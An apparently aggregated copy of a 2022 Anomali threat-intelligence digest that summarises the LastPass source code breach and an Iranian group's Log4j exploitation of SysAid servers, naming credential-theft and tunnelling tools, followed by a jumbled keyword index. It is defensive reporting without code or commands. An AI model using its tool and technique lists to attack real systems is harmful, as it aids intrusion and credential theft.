One Article Review
| Source |  Anomali |
|---|---|
| Identifiant | 6626943 |
| Date de publication | 2022-08-30 15:01:00 (vue: 2022-08-30 15:07:05) |
| Titre | Anomali Cyber Watch: First Real-Life Video-Spoofing Attack, MagicWeb Backdoors via Non-Standard Key Identifier, LockBit Ransomware Blames Victim for DDoSing Back, and More |
| Texte | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Authentication, DDoS, Fingerprinting, Iran, North Korea, Ransomware, and Russia. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
LastPass Hackers Stole Source Code
(published: August 26, 2022)
In August 2022, an unidentified threat actor gained access to portions of the password management giant LastPass development environment. LastPass informed that it happened through a single compromised developer account and the attacker took portions of source code and some proprietary LastPass technical information. The company claims that this incident did not affect customer data or encrypted password vaults.
Analyst Comment: This incident doesn’t seem to have an immediate impact on LastPass users. Still, organizations relying on LastPass should raise the concern in their risk assessment since “white-box hacking” (when source code of the attacking system is known) is easier for threat actors. Organizations providing public-facing software should take maximum measures to block threat actors from their development environment and establish robust and transparent security protocols and practices with all third parties involved in their code development.
Tags: LastPass, Password manager, Data breach, Source code
Mercury Leveraging Log4j 2 Vulnerabilities in Unpatched Systems to Target Israeli
(published: August 25, 2022)
Starting in July 2022, a new campaign by Iran-sponsored group Static Kitten (Mercury, MuddyWater) was detected targeting Israeli organizations. Microsoft researchers detected that this campaign was leveraging exploitation of Log4j 2 vulnerabilities (CVE-2021-45046 and CVE-2021-44228) in SysAid applications (IT management tools). For persistence Static Kitten was dropping webshells, creating local administrator accounts, stealing credentials, and adding their tools in the startup folders and autostart extensibility point (ASEP) registry keys. Overall the group was heavily using various open-source and built-in operating system tools: eHorus remote management software, Ligolo reverse tunneling tool, Mimikatz credential theft tool, PowerShell programs, RemCom remote service, Venom proxy tool, and Windows Management Instrumentation (WMI).
Analyst Comment: Network defenders should monitor for alerts related to web shell threats, suspicious RDP sessions, ASEP registry anomaly, and suspicious account creation. Similarly, SysAid users can monitor for webshells and abnormal processes related to SysAisServer instance. Even though Static Kitten was observed leveraging the Log4Shell vulnerabilities in the past (targeting VMware apps), most of their attacks still start with spearphishing, often from a compromised email account.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Phishing - T1566 | |
| Envoyé | Oui |
| Condensat | “chnome “delete “white 2008 2013 2018 2021 2022 44228 45046 able abnormal about access accessible account accounting accounts accounts; across actions active activities activity actor actors add added adding addition additional additionally address adds admin administration administrator advanced advised affairs affect affects after against agent alerts alias alibaba all allows also analysis analyst announced anomali anomalous anomaly another anti antivirus any anyone apache appears application applications approach apps apt apt29 archive are aren’t around arsenal artifacts asep asia assembly assessment assets att&ck att&ck: attached attachments attack attacker attackers attackers’ attacking attacks attribute attributed attributes audited august authenticate authentication autostart available back backdoor backdoors backup banshee based basic be: bear became been being believed below: benign between bianlian bianlian: binance binary black blames block boasts boot box brand breach breached browser build built business but bypass bytes cache call campaign campaigns can capabilities capability capable capture care case cause cco certain certificate certificates chain challenges channels charts check checking checks chen chief chollima chunks claims clearnet cloud cluster clusters code command comment: communications companies company complex component comprehensive compromise compromised concentrate concern conducts configuration configurations confuse connected connections consider containing context continue continuity control conversation copyright corporate could country:il country:ir country:kp country:kr country:ru country:us covert cozy craft create creating creation credential credentials critical cross crypto cryptocurrency crysys ctx:loginid current custom customer cve cyber cybereason cyberespionage cyble data database ddos ddosing debugger debuggerstepthrough debugging december decided decrypted decrypting decryption deepfake default defenders defense deliver democratic denial deny deobfuscate/decode deployment depth detect detected detection detection:bianlian detection:havanacrypt developer development device devices did digital directly directories directory disabling disconnect discovered discovery discuss discussed disks disposal divides dll documents doesn’t domain donald double downloading dprk drives dropping drops dubbed due dumping during each easier east educate education ehorus either eku email employed employees enable encounters encrypt encrypted encrypting encryption engineer engineering enhanced enough ensure ensuring entities entrust entrustcom environment environments espionage establish etc evade evasion even events eventually everyone example excessive exchange exe exec executable executables execution executives exfiltrating expletive exploit exploitation exposure extensibility extensive external extortion eye facilitating facing factor feasible featured federated federation figure file filecoder files finally fingerprinting first fix flag foggyweb folders following forcing found frequently from functionalities functionality functions fund further furthermore gac gained generated geopolitical get getting giant giving glimpse global goes golang golddragon google government group group:apt29 hack hackers hacking” had happened happens hard hardcoded hardening has havanacrypt have heavily help hologram host hosting hosts however hta html http identified identifier identifying identity immediate impact impersonate impersonating implement implements important incident include including incomplete increase independently indicator indicators individuals; industry infection information informed infrastructure ingress inhibit input instance instead instrumentation intelligence intended intentionally internal internet interpreter interruption investigated invitation involved involves ioc iocs iran iranian israel israeli issuance issue iteration its java jndi jong july june kaspersky keep key keys kim kimsuky kimsuky’s kitten known korea korean lab |
| Tags | Ransomware Hack Tool Vulnerability Threat Guideline Cloud |
| Stories | APT 37 APT 29 LastPass |
| Notes | |
| Move | 
|
L'article ne semble pas avoir été repris aprés sa publication.
L'article ne semble pas avoir été repris sur un précédent.